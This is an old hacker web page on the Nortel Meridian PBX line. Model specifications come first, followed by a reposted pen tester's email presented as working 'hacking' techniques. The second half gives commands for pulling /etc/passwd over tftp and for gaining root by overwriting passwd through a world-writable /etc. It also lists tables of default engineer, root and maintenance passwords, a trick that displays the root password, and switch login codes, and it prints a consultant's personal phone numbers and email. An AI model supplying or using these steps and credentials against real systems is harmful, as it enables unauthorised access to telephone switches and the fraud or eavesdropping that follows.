The Meridian Line of PBX's is referred to as: Options
The different Option are:
Option 11 and 11C
These are some of the smallest line of Meridian PBX's. They can host from 16-700
Users. Wall mountable.
Options 21,21E,51,51C,61,61C
These are modular in shape. They are usually 3'long,2'high and about 2'deep.
They can be stacked 4 high. They are normally Gray and say MERIDIAN1 on the
front.
Option 21-
(800) Max Ports and 21E (1200) Ports. Both are Single CPU systems- *These are
no longer available.
Option 51-
This host up to (1000) ports and is a single Processor like above. 51C's still
max out at 1000 ports but they utilize the Core Module Technology... in other
words the "C" is the newer model.
Option 61-
Host up to 2000 Ports because of it's Dual Processors.. These offers full redundancy.
61C- same as above, still 2000 ports just the incorporate the new Core Module
Technology.
Option 71,81 and 81C
sometimes referred to as a "MUTHA'S"
Option 71-
Hosts 10,000 ports, with its dual processors makes it a big PBX. This beast
can handle 35,000 basic calls per hour. This particular Option is no longer
made.
Option 81-
This Large Dual Processor Unit can also handle 10,000 ports but has twice the
call handle capacity as the 71 with 70,000 basic calls per hour.
Option 81C-
This is the fully loaded dual processor system. It can process the 70,000 basic
calls per hour and supports 5 Network Groups.
With the newest software "Release 25" the Option 81C can now handle
15,000 ports and boasts Intel II processors.
Only Options 11C, 51C(soon to be discontinued)61C and 81c are still sold today
HACKING Meridian NEW Feb 2, 2002 for all you GroundHogs :>
Sent in from a fellow Pen Tester. This stuff does work! because I've gotten in with it. There were a few techniques I was not privy to so this was GREAT info.
Posted with Permission from Mark A. Rowe at Pentest Limited
Thanks Mark!
----------------------- Email Excerpt -----------------------------
Hi Stephan,
I've just been on your website www.m4phr1k.com which is great. While browsing I noticed that you had started a section on Meridian and thought you might be interested in an email I posted to the pen-test list a while back. At the time HD Moore asked me whether I was going to write it up or put it on a website but I forgot all about it. Anyway if didn't already know it and think it is useful feel free to put it on your site when you have the time. I've never come across a system in the UK where the service account has had its password changed.
The email is below. I'll be looking at an Ericsson MD110 in the next couple of weeks, if I find anything useful I will let you know.
Regards,
Mark.
========================================================================
I came across this while doing a security review 3 years ago. I tried to contact
Nortel several times but never received a response. I guess they don't think
it is important :-o
If the PBX is hooked into the actual
network, there are quite a few ways to get access to the system. The easiest
method is to tftp the /etc/passwd file
off the system and crack the hashes. If you go this route, you will get a user
account called "service" with a password of "smile" ;) If
you log into
the system with this account, you will notice that /etc is mode 0777, so getting
root access is trivial:
$ echo "root::0:0:root:/root:/bin/sh" > /etc/mah_passwd
$ mv /etc/passwd /etc/passwd.bak
$ mv /etc/mah_passwd /etc/passwd
$ su root
# mv /etc/passwd.bak /etc/passwd
I don't remember which version of this system it was, but the client software
that came with it was called "Meridian Terminal Emulator". You could
manage
the PBX with this by first logging in with 0000/0000 then giving it the manager
password of "9999". I really wish I had more time to write up the
stuff I find out there.
HD
Anyway I think the service account exists on the MAX,CCR and Link Meridian components.
Here are some other stuff I came across,
Accounts that give UNIX level access:
| BOX | Account | Password | Use |
| MAX, CCR, LINK | service | smile | General Engineer Account |
| CCR, LINK | disttech | 4tas | Engineer Account |
| MAX | root | 3ep5w2u | Root |
Accounts that give application level
access
| BOX | Account | Password | Use |
| MAX | maint | ntacdmax | Maintenance Account |
| CCR, LINK | maint | maint | Maintenance Accout |
| CCR | ccrusr | ccrusr | User Account |
| LINK | mlusr | mlusr | User Account |
To gain root access on Link or CCR:
Login as disttech/4tas
type "showpwd"
at prompt enter first 3 letters from Yesterday and first 3 from Tomorrow (e.g. if today is Tuesday enter "MonWed" - note the capitalisation).
When you are told this is invalid, enter the same thing again.
The root password is now displayed in plain text on the screen. You can now "su" to root with this password.
To gain access to the Meridian itself - there are two methods of access depending how the switch is set up. Try password only first as most will probably be set up like this -
Password only
enter
logi 0000 (customer level)
logi 1111 (a bit higher)
logi 8429 (maintence)
Username and password
logi customer
PASS? 0000
logi admin1
PASS? 1111
logi to
PASS? 8429
Hope this helps,
Mark.
--
Mark Rowe
IT Security Consultant
PenTest Limited
Office 01565 830990
Fax 01565 930889
Mobile 07813 803929
mark.rowe@pentest-limited.com
www.pentest-limited.com